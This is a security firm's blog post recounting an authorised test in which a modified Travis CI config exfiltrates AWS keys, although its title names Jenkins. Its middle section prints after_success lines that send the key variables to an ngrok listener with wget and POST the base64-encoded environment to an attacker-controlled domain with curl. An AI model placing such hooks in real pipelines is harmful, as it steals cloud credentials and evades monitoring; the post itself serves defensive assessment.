Hacking Jenkins to prevent a cloud data breach

Alleen beschikbaar in het Engels

Blog post 3 February 2021 by Ricardo Sanchez, Senior Security Specialist at Secura


As security experts, we have performed a lot of cloud assessments in recent years, while the total industry is growing up. Sometimes we get these great questions from our clients, that would be lovely to share. One very interesting security assessment came from one simple question: “What is the worst thing that can happen if the laptop of a cloud developer is compromised?”

This is an understandable concern as massive cloud data breaches have recently occurred. Just to name a few as example: Capitol One lost + 100 million records in the US and + 6 million in Canada due to a server-side request forgery vulnerability [1], Marriot/Starwood over 500 million client records on a 4 year breach [2], Facebook/Cultura Colectiva 540 million records due to an AWS cloud misconfiguration [3] and River City media 1.34 billion records in an accidental data leak [4]. That is your worst nightmare for a cloud developer and possibly not so farfetched.

Adobe Stock 295355946

The anonymized scenario we assessed, had the following assumptions:

  1. The developer had no access to the AWS keys (and was not supposed to)
  2. To deploy cloud infrastructure CICD was used.
  3. The keys were saved in the CICD, where the developer had no access to the environment.
  4. The CICD process was monitored to prevent rogue or malicious deployments to the cloud.

After a joint threat modelling session we discovered interesting attack paths and we decided to extract the AWS keys from the CICD platform and bypass all security monitoring. And we did so, successfully.

In general the process of deployment infrastructure is:

  1. The code is written
  2. The code is pushed to github repository
  3. Once pushed to github, travis will process it automatically
  4. Travis runs a test on the CI
  5. The infrastructure is deployed to the cloud
Cloud blogpost figure 1 final 2 0

Figure 1: Standard CICD process flow

There are several “build systems” that exist today and each of them feature similar configuration options:

  • Jenkins
  • Travis CI
  • Azure Pipelines
  • AWS CodeBuild


In this particular example, Travis will be used as Travis CI is widely used and free.

Travis CI uses yaml files for deployment. In particular it uses the file .travis.yml. Since this particular file was under our control as “rogue developers” (the scenario that was defined by our client) we were able to modify it and push it to github. Once pushed to github travis will process it automatically.


Our first idea was to print the key variables and see them in the console. Unfortunately, the travis console was not accessible to us. Therefore, we were not able to see the output of the print statements. To extract the interesting key variables such as $AWS_ACCESS_KEY_ID, $aws_secret_key and $aws_key we did the following:

  1. Start a listener (like ngrok)
  2. Commit a modified `.travis.yml` file to the repository with the following code:


after_success:

  • echo $AWS_ACCESS_KEY_ID
  • wget http://<NGROK URL>/$(echo $AWS_ACCESS_KEY_ID)
  • wget http://<NGROK URL>/$(echo $aws_secret_key)
  • wget http://<NGROK URL>/$(echo $aws_key)


Alternatively, it was possible to pull the complete environment with:

  • ENV_SEND=`env | base64`
  • curl –X POST –k https:// domain-in-control-of-an-attacker.com/ --data “$ENV_SEND”


In the video below the full process can be observed:

Youtube banner template Cloudblog post Ricardo


About the Team

The worst case scenario if the laptop of a cloud developer is compromised was now answered with the potential impact to be next in the Cloud Data Breach “Hall of Fame”. Together with this client we also aligned to implement measures to prevent this from happening, which includes cloud services as outlined below: 1, 2 and 3.

This investigation was executed by our Secura Cloud experts: Roy Stultiens and Ricardo Sanchez. We would love to help you out to gain more insight Into Your Cloud Security.

We can help and offer several cloud services such as:

  1. Threat modeling
  2. Cloud security training
  3. Cloud crystal box assessment
  4. Cloud hacking training course
  5. Attack and Penetration tests
  6. Vulnerability management.


Ricardo is one of the cloud experts of Secura with a strong drive to always improve himself. He has a MsC in Cyber Security and enjoys completing several certifications a year, which leads to the following impressive list: OSCP, CISSP, SANS 588 (Cloud Penetration testing), SANS Manager 516 (Managing Security Vulnerabilities: Enterprise and Cloud), CCSK, AWS Certified Solutions Architect and Security Specialty, Azure Certified Security Engineer, Metasploit Pro Certified Specialist, Nexpose Advanced Administrator (NACA), Certified Ethical Hacker (CEH), eCCPT, eWPT, InsightIDR Certified Specialist, Network Assault, CompTIA Network and Security + Certifications. As well as a hacker badge in hack the box. His dog Taco is often by his side and a valued team member! Are you interested to boost your learning path too and become one of our ethical hackers? Join Secura!

Footnotes:

[1] https://www.capitalone.com/facts2019/

[2] https://krebsonsecurity.com/2018/11/marriott-data-on-500-million-guests-stolen-in-4-year-breach/

[3] https://www.cbsnews.com/news/millions-facebook-user-records-exposed-amazon-cloud-server/

[4] https://fortune.com/2017/03/06/spammer-leaks-data/